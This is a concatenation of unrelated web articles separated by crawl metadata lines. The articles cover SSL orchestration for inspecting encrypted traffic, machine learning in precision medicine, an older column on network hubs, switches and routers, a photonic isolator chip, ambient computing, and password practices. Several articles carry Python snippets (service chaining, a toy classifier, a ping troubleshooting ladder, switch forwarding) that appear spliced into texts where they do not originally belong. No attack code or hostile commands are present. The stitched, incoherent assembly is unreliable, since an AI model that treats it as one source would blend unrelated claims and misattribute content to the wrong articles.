One of the most popular and best ways to increase privacy for consumer and user data, whether at rest or in transit, is via encryption. Encrypting consumer and user data, and the channels over which that data is transmitted, is vital to keeping personally identifiable information private.
Today, encryption is ubiquitous. The attention on user and data privacy has helped to drive the explosion in encrypted traffic. In addition, there are many vendors now providing free or low-cost certificates in an effort to improve online security, which would benefit users, consumers, and businesses. In essence, they are trying to encrypt the entire web! According to F5 Labs, 86% of web page loads are now encrypted with SSL or TLS. And the Advanced Encryption Standard (AES) cipher accounts for over 96% of today's encrypted web traffic. The aforementioned privacy regulations and requirements like GDPR, CCPA, and others are driving the adoption of encryption, even if most of these regulations and requirements do not mandate encryption of user and personal data. However, many organizations will use encryption for user data and communications so that they don't infringe upon those same regulations and requirements.
While encryption is excellent at delivering privacy for users and their data, there is at the same time a problem with encryption, creating a serious conundrum for users and businesses alike: Attackers and hackers also love to use encryption to mask malware, ransomware, and other attack vectors. Encryption enables a security blind spot, unfortunately.
For instance, fraudulent websites used in phishing and spearphishing campaigns are increasingly using HTTPS to appear genuine in order to trick unsuspecting users into clicking on malware-infected links or to insert their username and password into convincing but phony login pages—and they even dupe users who have accepted the appearance of the little padlock in the address bar as being indicative of a safe, secure website. According to F5 Labs, 72% of phishing sites now use encryption. But, to make matters worse, not only are attackers, hackers, and other bad actors using encryption to hide threats; they’re also taking advantage of the privacy cryptography enables to evade detection from post-mortem forensics simply by using a specific threat campaign that includes malware and phishing sites only one time per victim.
Phishing is a very difficult attack to defend against because it exploits human psychology, leveraging social engineering, and mis- and dis-information. Phishing leverages human nature and emotions, such as fear. This is especially true during the coronavirus pandemic. And attackers know this and use it to their advantage. F5 Labs found that new HTTPS certificates containing the words “covid” or “corona” increased at the same time as spikes in COVID-19 cases. Even well-known healthcare sources like the World Health Organization (WHO) and the U.S. Centers for Disease Control and Prevention (CDC) have been and continue to be impersonated by attackers in targeted phishing campaigns that attempt to lure victims to malicious domains and download malware or other malicious attacks, or to trick them into typing in their user credentials into fake login pages.
So, how can an organization today defend the privacy of user and consumer data and personal information, while protecting itself from various attacks and breaches?
Organizations should employ a solution that can decrypt at scale the onslaught of encrypted traffic required daily for incoming and outgoing traffic. With the level of encrypted traffic today, the need to ensure user and consumer data privacy, and the computationally intensive task of decryption and re-encryption, leveraging an existing security solution to pull double-duty to deliver security and decrypt and re-encrypt traffic is a bad idea. An overloaded, overworked security device may simply begin bypassing encrypted traffic or not perform the security duties for which it was deployed.
To ensure the privacy and security of user and consumer data, and in an effort not to impinge on privacy regulations and requirements, organizations should employ a solution that intelligently enables user and consumer traffic that is private—such as financial or healthcare data—to bypass decryption. That traffic shouldn’t get a free pass, though, but should be inspected by a limited set of solutions in the security stack. However, this can only be achieved if the solutions in the security stack are not in a static daisy-chain, but are allowed to participate in dynamic security service chains, leveraging context-aware policies to route incoming encrypted traffic, once decrypted, to the appropriate security service chain.
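A minimal sketch of such context-aware service chaining is shown below. The category names, service names, and policy table are all invented for illustration; they do not reflect any vendor's actual configuration or API.

```python
# Context-aware service chaining (hypothetical sketch, not a product API).
# Flows tagged as private (health/finance) bypass decryption and visit a
# reduced inspection chain; all other traffic is decrypted, inspected by
# the full security stack, then re-encrypted.

PRIVATE_CATEGORIES = {"healthcare", "finance"}

POLICY = {
    "bypass":  ["dlp"],                         # limited chain, stays encrypted
    "inspect": ["ids", "malware_scan", "dlp"],  # full chain on decrypted traffic
}

def classify(flow: dict) -> str:
    return "bypass" if flow.get("category") in PRIVATE_CATEGORIES else "inspect"

def service_chain(flow: dict) -> list:
    action = classify(flow)
    if action == "bypass":
        return list(POLICY["bypass"])
    return ["decrypt"] + POLICY["inspect"] + ["re_encrypt"]

if __name__ == "__main__":
    print(service_chain({"category": "healthcare"}))  # ['dlp']
    print(service_chain({"category": "saas"}))
    # ['decrypt', 'ids', 'malware_scan', 'dlp', 're_encrypt']
```

The key design point is that the chain is computed per flow from policy, rather than hard-wired as a static daisy-chain of appliances.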
This is called SSL orchestration and the description above (hopefully) illustrates why it is so necessary today, not only to ensure organizational security, but to also confirm that user and consumer information is protected and kept private.
‘Precision medicine’ refers to the tailoring of medical treatment depending on a patient’s individual characteristics, e.g., genes, environmental factors, and lifestyle. If physicians could accurately predict an individual patient’s responses to different treatment options, the best option could be selected. For most diseases, the efficacy and safety of standard treatments are highly variable. Thus, individual-specific treatment protocols have been hailed as an emerging revolution in medicine, with the potential to improve patient care and deliver cost savings to health services.
Copyright by Felix Beacher via www.mdpi.com
Currently, precision medicine in real-world clinical practice is mainly associated with treatment based on cancer subtype and genotype. For example, olaparib is a monotherapy for ovarian cancer in women with BRCA1/2 mutations. However, there are still few examples of real-world precision medicine. Current clinical practice still relies heavily on subjective judgment and limited individual patient data. A ‘one-drug-fits-all’ approach is often used, in which a particular diagnosis leads to a specific type of treatment. Alternatively, trial-and-error practices are common, in which various treatment options are tried in the hope that one will work.
Machine learning (ML) has been described as ‘the key technology’ for the development of precision medicine. ML uses computer algorithms to build predictive models based on complex patterns in data. ML can integrate the large amounts of data required to “learn” the complex patterns required for accurate medical predictions. ML has excelled in diagnostics, e.g., in neurodegenerative diseases, cardiovascular disease, and cancer. ML approaches have also been used to predict treatment outcomes for a range of conditions, including schizophrenia, depression, and cancer.
In 2014, IBM launched ‘Watson for Oncology,’ which aimed to use ML to recommend treatment plans for cancer, based on combined inputs from research, a patient’s clinical notes, and the clinician. However, this project has so far failed to deliver the kinds of commercial products which had been envisioned. Other reports have used ML to predict treatment outcomes for cancer. One study used ML to predict patient survival based on microscopy images of cancer biopsy tissue and genomic markers. Another study used ML to predict response to treatment in patients with cervical and head cancers based on PET images. Despite such advances, there are currently no ML-based tools approved by regulators.
A significant limitation of these kinds of exploratory approaches to ML-based tools for clinical practice is that they tend to rely on types of data that are expensive to collect and may require specialist skills to analyze (e.g., genomics or MRI/PET imaging). This limitation can be a barrier to translating systems into tools for routine clinical practice. One possible way to address this is to base such systems on data from Phase III clinical trials: studies that provide the pivotal data for regulators to assess whether a new drug should be commercially approved. Phase III clinical trials are typically large enough for ML (usually 1000+ subjects) and include a wide range of data (e.g., demographic, clinical, and biochemical), which can be easily stored in tabular format. Moreover, the current trend is towards making clinical trial datasets publicly available. Thus, Phase III clinical trial data may be a good source for developing practical ML-based tools for precision medicine. This approach is relatively untried: a literature search revealed only one prior study that used clinical trial data to predict treatment responses. This study used ML to predict responses to an anti-depressant after 12 weeks. This was an important first step; however, the accuracy level was modest (65%). It is possible that, with different data, and with a different approach to modeling, a level of accuracy could be achieved which could lead to the development of tools for real-world clinical practice. […]
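As a toy illustration of the general approach, the sketch below fits a hand-rolled logistic regression to synthetic tabular data in which a "treatment response" depends on a single made-up biomarker. All features, labels, and thresholds are invented; this shows only the shape of such a model, not any real trial result.

```python
# Toy sketch: predicting "treatment response" from tabular, trial-style
# data with a hand-rolled logistic regression (standard library only).
# The features, labels, and responder rule are synthetic stand-ins for
# real Phase III covariates; nothing here reflects an actual trial.
import math

def make_data(n=200):
    rows, labels = [], []
    for i in range(n):
        age = (i % 50) / 50.0                   # deterministic pseudo-feature
        biomarker = ((i * 7) % 10) / 10.0       # deterministic pseudo-feature
        rows.append([1.0, age, biomarker])      # leading 1.0 is the bias term
        labels.append(1 if biomarker >= 0.6 else 0)  # invented responder rule
    return rows, labels

def sigmoid(z):
    if z < -60.0:
        return 0.0
    if z > 60.0:
        return 1.0
    return 1.0 / (1.0 + math.exp(-z))

def train(rows, labels, lr=0.5, epochs=400):
    w = [0.0] * len(rows[0])
    for _ in range(epochs):
        for x, y in zip(rows, labels):
            p = sigmoid(sum(wi * xi for wi, xi in zip(w, x)))
            g = p - y                           # gradient of the log-loss
            w = [wi - lr * g * xi for wi, xi in zip(w, x)]
    return w

def accuracy(w, rows, labels):
    preds = [1 if sigmoid(sum(wi * xi for wi, xi in zip(w, x))) >= 0.5 else 0
             for x in rows]
    return sum(p == y for p, y in zip(preds, labels)) / len(labels)

if __name__ == "__main__":
    rows, labels = make_data()
    w = train(rows, labels)
    print(f"train accuracy: {accuracy(w, rows, labels):.2f}")
```

A real system would use held-out validation data, richer covariates, and calibrated probabilities, but the tabular-data-in, response-prediction-out pipeline is the same shape.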
Read more: www.mdpi.com | <urn:uuid:6591eeee-dd7b-46b0-acad-aa7a25749a34> | CC-MAIN-2022-40 | https://swisscognitive.ch/2021/07/19/research-paper-machine-learning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00488.warc.gz | en | 0.941098 | 837 | 3.453125 | 3 |
Your Network's Traffic Cops
Understand how hubs, switches, and routers direct traffic on your network.
- By Bill Heldman
Last column we talked about the cabling in your building and the MDF and IDFs. Remember that great admins know a heck of a lot more about their network than just the server farm; your goal should be to fully understand your network's components, something we collectively call the infrastructure.
This month we'll dig into the switches, hubs and routers, interesting
boxes (but not dreadfully complicated, at least in basic installations)
that act as the traffic cops for your network. If you understand why
you'd choose switches over hubs, when you need a router, and how all of
these devices hook together and talk to one another, you'll be a long
way down the road toward a thorough understanding of networks as a whole.
Switches and Hubs
As a general rule of thumb, the patch panel isn't where you'll connect
computing gear. All users and most servers will connect to switches or
hubs. The wiring coming in from an office is connected to the rear of
the patch panel. Then a patch cable is run from that port to a port on
the switch or hub; see the double-dashed lines in Figure 1. In the figure,
you can also see that the switches connect by a special port called the
uplink port to another switch (the dotted lines). Switches that are connected
in this fashion are called stacked switches. Routers usually connect to
a port on the same switches and hubs as the servers and users. The idea
is that all computing devices eventually connect to a port on your switches
or hubs. Users simply have a longer way to go before they connect up to
a switch or hub.
|Figure 1. Server A is connected to an Ethernet
port on a switch in the MDF. Server B is connected to a fiber port
on the same switch. Server C is connected to a fiber port on a switch
in the IDF. The two switches in the IDF are connected to one another
by a jumper cable on the uplink ports. Incoming wiring from offices
passes into the patch panel. Patch cables then run from the patch
panel jacks to the switches. In this way users can communicate with
the servers. Switch ports can be mixed and set for various data transfer
rates. Servers are connected to the backbone.
There are a lot of places for something to go wrong when you consider
the connectivity a user has with a server. The data has to pass from the
user's computer to the NIC, through a patch panel to the wall jack, through
the cabling running from the back of the wall jack to the back of the
patch panel at an IDF or MDF, out the front of the patch panel to a patch
cable connected to a switch or hub, through the switch's fabric
and out through a patch cable to the server. There are many places for
failure and we haven't even mentioned the cabling between an IDF and MDF!
You can also see how any one of these connections, if they're weak or
failing, might introduce some erratic behavior in a user's computing experience.
When troubleshooting erratic behavior on a single user workstation, start
with the NIC, testing the TCP/IP software, and work outward. You may have
to sniff the network or bring in a cabling expert to pinpoint the exact
difficulty. NICs that fail sometimes become chatty, putting out
excessive packets on the network and using up a lot of bandwidth in the
process. (Note: Windows NT Network Monitor software, now called
System Monitor in Windows 2000, can help you find chatty NICs.)
Why test the TCP/IP software? Because often a user can't communicate
due to incorrectly configured TCP/IP components. Start troubleshooting
by seeing if you can ping the loopback adapter (127.0.0.1), a failsafe
that tells you simply that the TCP/IP software is working correctly. Next,
see if you can ping your host's IP address, then ping a host adjacent
to the one you're on and finally try to ping a host across the backbone.
Be sure to attempt your pings by name and by IP address so that you validate
your name-server configurations. I can't tell you how often I've run into
problems that center around invalid name-server configurations; remember that Windows software prefers either NetBIOS or DNS names as its preferred path for locating hosts. Your erratic problem may not be hardware at all, just a simple TCP/IP configuration. Looks like hardware, smells like hardware,
turns out to be software. D'oh!
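That escalating ping sequence is easy to script. The sketch below shells out to the operating system's ping utility; the target addresses and names are placeholders to replace with hosts on your own network.

```python
# Escalating connectivity test: loopback -> own IP -> adjacent host ->
# across the backbone -> by name. Target values are placeholders.
import platform
import subprocess

def ping(target: str, count: int = 1) -> bool:
    """True if `target` answers a ping; relies on the OS ping utility."""
    flag = "-n" if platform.system() == "Windows" else "-c"
    try:
        result = subprocess.run(["ping", flag, str(count), target],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL,
                                timeout=5)
        return result.returncode == 0
    except (subprocess.TimeoutExpired, FileNotFoundError):
        return False

def ladder(rungs, probe=ping):
    """Run the ping ladder in order, stopping at the first failure."""
    for label, target in rungs:
        if not probe(target):
            return f"FAILED at {label} ({target})"
    return "all rungs passed"

if __name__ == "__main__":
    # Only the loopback rung is live here; extend the list with your own
    # hosts, e.g. ("own host IP", "192.0.2.10"), ("adjacent host",
    # "192.0.2.20"), ("across the backbone", "198.51.100.5"), and a rung
    # by hostname to exercise your name servers.
    print(ladder([("loopback (TCP/IP stack)", "127.0.0.1")]))
```

The first rung that fails tells you which layer to investigate: the local stack, the local segment, the backbone, or name resolution.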
Hubs: why you don't want them
Hubs are older devices that are dumb. What we mean by that is that
they don't have any intelligence built into them to effectively manage
the traffic between several computing devices (stations). Hubs simply
relay the data from one place to the other. You might think of hubs as
stop signs that assist with the management of traffic, but they really
don't have any capacity to interfere with traffic flow. This isn't a tight
analogy, but it gives you a sense of the lack of capability in hubs.
All data flowing from various stations into and out of a device such
as a hub is scrunched together so that the packets flow in an even line.
When we describe this process we use a more technical term than "scrunch": we
say that the data is multiplexed, or more tersely muxed. Figure
2 shows this in more graphic detail.
|Figure 2. Hubs mux, therefore they are dumb.
So hubs do muxing pretty well. But the problem is that they don't really
care about one station over another. If station A needs to transmit a
lot of data and it gets to the plate first, station B has to wait for
the hub to give it an opening and mux it out the door to its destination.
In other words, hubs don't intelligently manage the data. They simply
lack the brains for it. Additionally you can't define things such as Quality
of Service (QoS) circuits to give preferential treatment to one station
or kind of data over another or set up virtual pools of ports like you
can in switches. A hub is simply a pass-through point for the data. The
data is brought in and muxed out.
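The contrast is easy to model in miniature: a hub repeats a frame out every port except the one it arrived on, while a switch learns which station sits behind which port and forwards only where needed. The port numbers and MAC strings below are invented for illustration.

```python
# Toy frame forwarding: hub vs. learning switch (invented ports/MACs).

def hub_forward(in_port, ports):
    """A hub blindly repeats every frame out every port except the one
    it arrived on, so every station sees every frame."""
    return [p for p in ports if p != in_port]

class LearningSwitch:
    """A switch records source-MAC -> port as frames arrive, then forwards
    each frame only to the learned destination port (flooding unknowns)."""
    def __init__(self, ports):
        self.ports = ports
        self.mac_table = {}

    def forward(self, in_port, src_mac, dst_mac):
        self.mac_table[src_mac] = in_port               # learn the sender
        if dst_mac in self.mac_table:
            return [self.mac_table[dst_mac]]            # targeted delivery
        return [p for p in self.ports if p != in_port]  # flood unknowns

if __name__ == "__main__":
    ports = [1, 2, 3, 4]
    sw = LearningSwitch(ports)
    print(sw.forward(1, "aa:aa", "bb:bb"))  # unknown dest, flood: [2, 3, 4]
    print(sw.forward(2, "bb:bb", "aa:aa"))  # learned, just port 1: [1]
    print(hub_forward(1, ports))            # a hub always repeats: [2, 3, 4]
```

After a few frames the switch delivers each conversation only to the two ports involved, which is exactly why the shared-bandwidth traffic jam of a hub disappears.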
Hubs are fine in small environments such as a Small Office Home Office
(SOHO) environment, where you have a half-dozen computers and you're not
into heavily intense processing. But in a corporate environment of any
size, hubs aren't practical and will, at some juncture, begin to bog down
the network. Job One for an admin in a new position is to assess the hub/switch
infrastructure and get the hubs out of the picture, especially
if they're older, slower 10Base-T jobs that have been in operation a while.
(Recall from last column's conversation that 10Base-T means the data is
able to flow at a maximum of 10 million bits (not bytes!) per
second; not a tremendously fast data transfer rate in today's high-speed world.)
Another interesting point to consider with hubs is that each port generally
has the same data transfer rate as all the others. Not only that, but
the uplink port (the place at which the hub connects to the network) is
usually also set for the same speed. You don't have to be Einstein to
figure out that if you have six or seven fast machines connected to 10Base-T
ports on an eight-port hub with the output directed out another 10Base-T
port, you've basically got a Southern California traffic jam. It's a simple
matter of understanding the bit flow.
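The arithmetic behind that traffic jam is worth making explicit: compare the worst-case demand of the station ports against the uplink's capacity. A quick calculation with the numbers above:

```python
# Oversubscription check: worst-case station demand vs. uplink capacity.

def oversubscription(station_ports: int, port_mbps: float,
                     uplink_mbps: float) -> float:
    """Ratio of total station demand to uplink capacity; above 1.0 the
    uplink can become a bottleneck."""
    return (station_ports * port_mbps) / uplink_mbps

if __name__ == "__main__":
    # Seven stations on 10Base-T ports feeding one 10Base-T uplink:
    ratio = oversubscription(station_ports=7, port_mbps=10, uplink_mbps=10)
    print(f"{ratio:.0f}:1 oversubscribed")  # 7:1 oversubscribed
```

Any ratio much above 1:1 means the uplink, not the stations, sets the effective speed of the whole segment.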
A term you should be familiar with as you shop for these devices is port
density. Hubs and switches are sold by the number of ports that they have
(typically in increments of four or eight). The port density of an eight-port
hub is seven, because the uplink port utilizes one of the eight available.
If you have six machines connected, your port density is exhausted; it's
almost time to purchase a new device. Port density is something that good
admins will actively monitor in their IDFs and MDF. Nothing is worse than
to have a new employee arrive at an office in a wing of your building
only for you to realize that you're out of ports and can't hook up the
Also note that hub/switch vendors typically advertise their wares on
a per-port basis. It sounds more reasonable if a vendor can quote you
"Under $99 a port" than "This switch costs $2,999". When pricing out gear,
calculate the per-port price to make sure you're not getting raked.
Switches, better but more expensive
Switches, on the other hand, have a processor, code and a management
user interface (UI) built into them that can handle the intelligent management
of traffic between computing devices. This internal management of traffic
is a wonderful thing that greatly increases the overall performance of
the network. (If the Internet's networks were still using hubs, it would
be a very slow Internet indeed!) However, there's a price to pay for using
switches instead of hubs. You can see this for yourself by going to your
neighborhood computer store and pricing a little four- or eight-port hub
for your house. You'll find that you can obtain one for under $20. The
same number of ports in a switch, on the other hand, will cost close to
$100. You're paying for the intelligence that manages the switch's connectionsgenerally
onboard RISC processors. The same is true for corporate-class switches
and hubs. Plan on paying roughly an order of magnitude more for a switch
than for a hub of the same number of portsi.e., a 24-port hub might
cost $300 whereas a 24-port switch may cost anywhere from $1,500 to $3,000.
Where hubs are stop signs, switches are regular stoplights.
Another facet of switch technology that you may be interested in involves
buying a big chassis box, then adding the modules that you require as
your needs grow. This is interesting in the following way: Suppose that
you have a fiber-optic backbone on your network running at the gigabit
Ethernet data transfer rate (1000Base-T). You desire for your larger busier
servers to utilize the fiber backbone and your smaller servers and your
users to connect with Ethernet cable. Further, you want to give some of
your power users the ability to connect at 100Base-T, while the rest of
your user community will connect at 10Base-T (not a big deal for the average
user who is simply utilizing the Internet and e-mail).
This problem is easily solved with chassis-based switch cabinets that
allow you to purchase and slide in various modules that fit your needs.
You might buy a four-port fiber-optic module for your servers and two
24-port modules for your users. The ports on the switches can be adjusted
to accommodate 10/100 or 1000Base-T (we'll talk about auto-negotiation
in just a moment) so you can really get into the tuning of your network
in very explicit ways.
Sounds good, right? Well, be ready buck-o, because the price tag on these
units goes from a few thousand to tens of thousands of dollars. The UI
doesn't change much and the switches are really easy to configure and
manage, but the chassis overhead heavily drives up the cost. In some cases
you can also add redundant switch engines and power supplies so that you
have built-in fault-tolerance in your cabinets. When you purchase chassis-based
switches, you choose from an a la carte menu. Be prepared to get an education
in differences between fiber-optic jacks, backbone connections and so
forth. You can get in over your head very quickly.
Auto-negotiationthe worst invention in networking
Both Network Interface Cards (NICs) and switch ports have the ability
to detect the speed of their current connection. We call this auto-negotiation.
The NIC says "Hey! I need to send data, what speed should I send at?"
The switch gets the message and says "Send at 10Base-T" or "Send at 100Base-T"
or whatever. There's an added twist to this because the two can negotiate
whether they're going to talk one at a time (half-duplex) similar to a
cell-phone call, or they can carry on a two-way conversation (full-duplex),
as with a regular telephone call. So you have a myriad of choices a gigabit-rated
NIC and switch port can choose from:
- 10Base-T half-duplex
- 10Base-T full-duplex
- 100Base-T half-duplex
- 100Base-T full-duplex
- 1000Base-T half-duplex
- 1000Base-T full-duplex
What's your poison?
My problem with auto-negotiation is that for some reason, especially in
Windows networking, the two (switch port and NIC) seem to want to negotiate
to the least common denominator. If you've got sluggish servers or workstations,
chances are very good the NIC has detected 10-half while the port is trying
to talk at 100-full or some other goofy configuration. I've seen all kinds
of negotiations and they always create data transfer speed issues with
The secret? It's all about management. You have to be diligent about
setting the NIC software in your client computers and servers for a given
speed, then make sure that you set the switch ports to match. You'll help
yourself in more ways than you realize by simply being proactive about
the management of the negotiation between your hosts and their associated
ports. For example, suppose that you have a 24-port switch whose ports
are all rated for 10/100Base-T. You have 12 users. It's no big deal to
make sure that the bottom half of the switch (the ports are all numbered
so you know which ports you're adjusting) is set for 10Base-T Full. Then,
hook up your user computers to the bottom half of the switch and go into
each computer's NIC software to make sure it's negotiating at 10 Full.
You've matched the NIC to the port and you'll have a much happier network,
Note that NetWare servers (at least pre-NW 6) don't have the ability
for admins to go in and adjust the data transfer rate. Our NetWare 5.1
servers where I work are set for 100 Half and cannot be changed. Recently
we found that the switch ports they were connected to were auto-negotiating
andgo figurethey negotiated at 100 Full. As soon as we changed
the switch ports to match the 100 Half settings on the Netware boxes we
had instantly happier servers.
Tip: If you have a Netware/Windows shop, you're not doing yourself
any infrastructure favors by hosting the IPX protocol. Get it off of your
network as soon as possible and get to a completely native TCP/IP environment.
You'll be happy you did because it will cure a myriad of sluggish network
ills. More on that next time.
Layer 2 versus Layer 3 Switches
Some of today's switches have the ability to be not only switches (which
operate at the Data Link layer, or layer 2, of the OSI model) but also
as routers operating at the Network layer (layer 3), where conventional
hardware routers operate. By getting into layer 3 switches, as they're
called, you get out of the hardware router business, but add complexity
to the overall design of the switch fabric because now the switch is not
only handling the switching of data, but also routing it out the door
to other destinations.
For more information on the OSI model, go to www.webopedia.com
and key in OSI. You'll get all the information and links you need.
Virtual Local Area Networks (VLANs)
Another element that switches bring to the table are VLANs. If you go
through your CCNA training (see below) you'll get a hefty dose of what
VLANs are all about. Essentially the idea is that you want to segment
your traffic in a way that matches the logical usage of your network.
You might have a group of HR and financial folks that need to talk to
an ERP server all day long. This is a great use for VLAN technologythe
switches afford you a way to lump users together into a common unit that's
independent in the switch fabric from others, thus presenting a faster
user experience. VLANs can traverse switchesfor example, you can
have ports 8-16 of one switch and ports 4-12 of another all belong to
a single VLAN.
Remember this: VLANs must go through a router or layer 3 switch
to talk to other VLANs. No router, no inter-VLAN dialog.
While relatively easy to set up and manage, VLANs are definitely an advanced
networking topic and well out of the purview of junior admins. But know
that they exist and that your troubleshooting must take them into account.
Routers examine packets and make a decision about which direction to send
them in. Sounds simple, huh? It can get deep very quickly.
You can turn Windows NT/2000 Servers into routers. Windows 2000 especially
is good at being a router. However, the art of internetworking as it's
called, i.e. management of routers, is usually left to specialized individuals
who never touch servers and who usually insist on hardware devices to
do the routing. You'd use Windows 2000 routers only in smaller installations
or specialized cases.
Routing can become incredibly complicated when you consider the intermixing
of different WAN protocols and associated hardware coupled with the capabilities
of the router, so it's not a topic that's usually discussed in mixed context
with server administration.
That being said, let me say this about that. Lots of server admins desire
in their heart to get their Cisco Certified Internetwork Expert (CCIE)
certification. This is the holy grail of all network certifications
and is extremely difficult to obtain. Why do admins want it? I believe
it's because they've heard that CCIEs make six-figure salaries and they
have sexy jet-set jobs as router jocks.
True. But they also work 24/7/60-60, are on constant call-out, think
nothing of spending 10-12 days straight in router closets, rarely see
their families and generally get burned amazingly fast. I've known router
weenies (don't tell them I called them that) who worked four straight
days over Thanksgiving weekend getting some new routers goinggrabbing
some shut-eye in a cubicle while their partner continue configuring the
blasted routers! It is a terrible job and really worth much more
than six figures. Just an observance from your uncle Bill.
Understand This Stuff
|The CompTIA Network+ test will go a long
way in the switch and hub area of your education. However,
I would also recommend checking into Cisco's Certified
Network Asssociate (CCNA) certification. While the certification
is Cisco-centric (i.e. you'll have to learn what the latest
Cisco switchgear models are) all aspects of switching
in general are thoroughly covered and you'll be well prepared
to understand switching, regardless of the vendor. Sybex,
my publisher (www.sybex.com),
offers a complete line of Cisco certification study products,
including an e-virtual trainer that simulates the switch
and router configuration screens of various Cisco products.
(Check out www.bestbookbuys.com
for the very best in pricing for these and other materials.)
You can also get gobs of Cisco certification information
and news from TCPmag.com
Whew! There is a lot to know when you start getting into switches,
hubs and routersthe traffic cops of the network. They're really
fun cool boxes to work with and you shouldn't be afraid of them. But you
should get into an education about the technology before you try to implement
it. There is no better way to do this than pick up a switch for your home
network and mess around with it a little. In fact, you might be able to
find a used 3COM SuperStack 3000 or similar device from Cisco, Bay (Nortel)
or other vendor that you could pick up for a song, then practice setting
it up, breaking it down, and reconfiguring the whole mess yet again.
Next month we talk about another huge subjectprotocols and their
import on the whole network infrastructure. Remember that the infrastructure,
like a highway, is there for the data that traverses it, so it's important
that you adequately manage the protocols going across it in order to assure
that your data gets where it needs to go as quickly as possible. | <urn:uuid:4e1ee25d-443e-4aee-aca0-c5d3dc2eb07a> | CC-MAIN-2022-40 | https://mcpmag.com/articles/2002/04/01/your-networks-traffic-cops.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00488.warc.gz | en | 0.933986 | 4,648 | 2.859375 | 3 |
Photonic chip that isolates light could end size limitations in quantum computing and devices
(NSF.gov) Researchers at the University of Illinois used readily available materials to create a small photonic circuit that uses sound waves to isolate and control light and can adapt to different wavelengths. The innovation could lead to miniaturized quantum devices that transform quantum computing and information systems.
Transmitting data by manipulating photons — particles of light — that travel at the speed of light using quantum devices is how information reaches around the globe almost instantly. The new breakthrough makes quantum technology more functional and portable. The researchers, funded in part by the U.S. National Science Foundation, published a paper detailing their results in Nature Photonics.
Using common optical materials, the team developed a non-magnetic isolator that is a fraction of the size of conventional isolators. The chip-sized isolator can isolate and control the direction of light and eliminate the adverse impact of unblocked light on device performance. The design is an answer to the scale and utility issues of conventional quantum technology, the scientists said.
Miniaturizing quantum computing devices is critical to realizing the full potential of quantum technology, the researchers said. Developing quantum technology devices with applications that are scalable and practical will advance quantum computing, information systems and applications.
“An isolator is a device that allows light to pass uninterrupted one way and blocks it completely in the opposite direction,” said study author Benjamin Sohn. “This unidirectionality cannot be achieved using common dielectric materials or glasses, so we needed to be a little more innovative.” | <urn:uuid:15e6a744-0ab9-46e0-be23-5502aee84a74> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/photonic-chip-that-isolates-light-could-end-size-limitations-in-quantum-computing-and-devices/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00488.warc.gz | en | 0.900319 | 330 | 3.265625 | 3 |
Welcome to the future of IoT and perceptive intelligence, where user interaction is optional and contextual awareness is machine learning enabled.
Human interface that connects us with machines — the way we interact and control them — has changed a lot over the years. From tactile methods like knobs, buttons, keyboards, pads and touch screens to more recent voice and visual command capabilities, we’ve adapted our devices to become more user-friendly and more humanlike by using more intuitive input techniques. We’ve all grown accustomed to the swipe, the pinch, the “Hey, Google,” and the hand gesture to tell our devices what to do. But they still require the human element, a proactive direction by a person. That, too, is changing.
A new generation — indeed, ecosystem — of devices, will be driven by interfaces that perceive your wants and needs. Welcome to the future of IoT and perceptive intelligence, where user interaction is optional and contextual awareness is machine learning enabled. When devices transition from collecting and transferring information to using that information intelligently on their own, computing has become ambient.
Although based on some level of human interaction, ambient computing doesn’t require active participation. Artificial intelligence and deep learning can now power entire integrated ecosystems of devices to learn about users, their environments and their preferences, and then adjust accordingly to provide the optimal response or action. This kind of perceptive intelligence is enabled by sensors and vision and is embedded in our living and working spaces in a way that allows its use without being fully aware that we are doing so.
This level of intelligence is a result of the progression of AI and machine learning to deep neural networks that change the paradigm from sensing to perception and, ultimately, recognition of intent. Recent breakthroughs in deep learning are creating a revolution in the application of AI-to-speech recognition, visual object recognition and object detection. The connected devices provide the data and the AI learns from that data to perform certain tasks without human intervention.
Best of all, perceptive intelligence doesn’t even require a connection to the internet. Edge-based processing now has the performance and accuracy required (as well as the energy efficiency and small form factors to fit in battery-powered consumer products) to run sophisticated AI and machine learning algorithms locally, sparing users the cost, bandwidth, latency and privacy challenges of a cloud-based model. Now, devices can collect and analyze video and audio data and respond intelligently in near real time — without the risk of compromising user privacy or security or the cost of transmitting literally zettabytes of data to the cloud-based data centers. […] | <urn:uuid:ce890da1-d10d-43df-bc87-97bde46ef28e> | CC-MAIN-2022-40 | https://swisscognitive.ch/2020/05/23/neural-networks-and-machine-learning-are-powering-a-new-era-of-perceptive-intelligence/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00488.warc.gz | en | 0.92816 | 532 | 2.625 | 3 |
It seems like every platform has different requirements for passwords.
And the complexity can make it somewhat of a mess when it comes to remembering how to access accounts.
One requirement, however, is pretty consistent: The password needs to be a certain number of characters. The current recommendation from the National Instituate of Standards and Technology (NIST) is a minimum of eight characters.
Essent Systems Integration Manager Damon Kopp recently led a company training session on passwords and provided some interesting insights along the way — including why eight characters is the standard. Here is some of what we learned.
Passwords Are Ancient
Passwords were used at least as early as the Roman military.
Passwords pre-date the internet, computers, and even electricity. Some light etymological research reveals passwords were used at least as early as the Roman military.
Literally, a password is a word that allows you to pass into a certain area, and it's clear to see how that would be of use in military situations. Passwords are also defined as words that distinguish between friend and foe.
Billions Of Email Addresses Are Compromised
A lot of password breaches are minor, like getting your email scraped onto a marketing list. But many are not.
Almost 6.5 billion email accounts have been compromised in some way, according to web security expert and author Troy Hunt. Hunt runs a website where you can check if your email address has ever been compromised.
A lot of these are minor, like a bot scraping your email address to make a marketing list. But a lot of them are not, especially if the breech includes a password or if the password attached to your email account is not strong.
Don’t Double-Dip Your Passwords
We know — it’s basically impossible to remember your passwords now even without individualizing for every site. But there are tools and stratgies.
It’s a risk to use one password for more than one platform because if someone cracks your password on one platform, now they have your password for multiple platforms.
We know, we know — it’s basically impossible to remember your passwords now even without individualizing for every site. But there are strategies and tools that make it easier.
One strategy is to use a prefix or suffix for each platform. For example, if your regular password is 12345 (we hope not!) then your email password might be 12345-mailbox or your fantasy sports login might be pigskin-12345.
Additionally, LastPass, owned by the GoToMeeting maker Citrix, is a tool for password management. It stores all of your passwords behind one master password, so that you only need to remember the one master password (better make that one password a doozy though!).
